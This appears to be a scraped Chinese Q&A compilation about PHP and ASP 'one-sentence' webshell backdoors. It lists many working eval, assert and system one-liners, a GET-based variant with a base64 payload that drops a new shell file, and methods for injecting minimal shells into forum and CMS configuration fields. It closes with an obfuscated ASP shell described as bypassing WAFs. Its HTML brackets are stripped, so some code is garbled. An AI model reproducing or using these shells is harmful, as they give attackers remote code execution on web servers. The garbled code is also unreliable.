本文目錄一覽:
- 1、一個有意思的 PHP 一句話後門,怎麼破
- 2、webshell怎麼寫出來的
- 3、求高手看一下這段PHP代吧。呢些是網站木馬。後門啥的給過濾下
- 4、php一句話木馬~呢?
- 5、求分享最新php過狗大馬或者一句話
一個有意思的 PHP 一句話後門,怎麼破
?php eval($_POST1);?
?php if(isset($_POST[‘c’])){eval($_POST[‘c’]);}?
?php system($_REQUEST1);?
?php ($_=@$_GET1).@$_($_POST1)?
?php eval_r($_POST1)?
?php @eval_r($_POST1)?//容錯代碼
?php assert($_POST1);?//使用Lanker一句話客戶端的專家模式執行相關的PHP語句
?$_POST[‘c’]($_POST[‘cc’]);?
?$_POST[‘c’]($_POST[‘cc’],$_POST[‘cc’])?
?php
@preg_replace(“/[email]/e”,$_POST[‘h’],”error”);?/*使用這個後,使用菜刀一句話客戶端在
配置連接的時候在”配置”一欄輸入*/:Oh=@eval_r($_POST1);/O
?php echo `$_GET[‘r’]` ?
//繞過?限制的一句話
script language=”php”@eval_r($_POST[sb])/script
webshell怎麼寫出來的
form action=http://主機路徑/TEXT.asp method=post
textarea name=value cols=120 rows=10 width=45
set lP=server.createObject(“Adodb.Stream”)//建立流對象
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet=”gb2312″ //字體標準
lP.writetext request(“newvalue”)
lP.SaveToFile server.mappath(“newmm.asp”),2 //將木馬內容以覆蓋文件的方式寫入newmm.asp,2就是已覆蓋的方式
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect “newmm.asp” //轉向newmm.asp
/textarea
textarea name=newvalue cols=120 rows=10 width=45(添入生成木馬的內容)
/textarea
BR
center
input type=submit value=提交
這裡通過提交表單的方式,將木馬提交上去,具體的做法是將定義一個對象IP,然後以文本方式寫入newvalue裡面的內容(newvalue的內容在textarea定義),寫入以覆蓋的方式產生ASP文件,然後執行這個腳本。
其中客戶端中的value代表的是表單的名字,必須跟服務端(本機)的post提交中的表單名一樣,所以這裡的value可以為任意字元,相當於一個密碼之類的東西,但是這個『密碼』是明文的,可以截取下來。
擴展資料:
寫webshell的方法
利用””””:””//”等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以。
舉例,在管理郵箱處添上cnhacker@263.net”:eval request(chr (35))//,
在配製文件中就是webmail=”cnhacker@263.net\”:eval request(chr(35))//”,
還有一種方法就是寫上 cnhacker@263.net”%%eval request(chr(35))%%’,這樣就會形成前後對應,最小馬也就運行了。%eval request(chr(35))%可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。
再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話 馬”%%execute request(”l”)%%’,保存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp.
參考資料:
百度百科webshell
求高手看一下這段PHP代吧。呢些是網站木馬。後門啥的給過濾下
?php
@preg_replace(“/[checksql]/e”,$_POST[‘keio’],”saft”);
?
這段是一句話後門
php一句話木馬~呢?
超級隱蔽的PHP後門:
?php $_GET[a]($_GET[b]);?
僅用GET函數就構成了木馬;
利用方法:
?a=assertb=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
執行後當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用
求分享最新php過狗大馬或者一句話
很好,你這個的確過狗過阿里雲和主流WAF。
我也分享我收藏的過狗PHP大馬和一句話,兄弟不要發給別人了。
PHP的沒找到。。。來個asp的吧
%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=iloveyou
CNM=Request(OK)
eVal CNM ‘pass:我愛你
%
原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/272001.html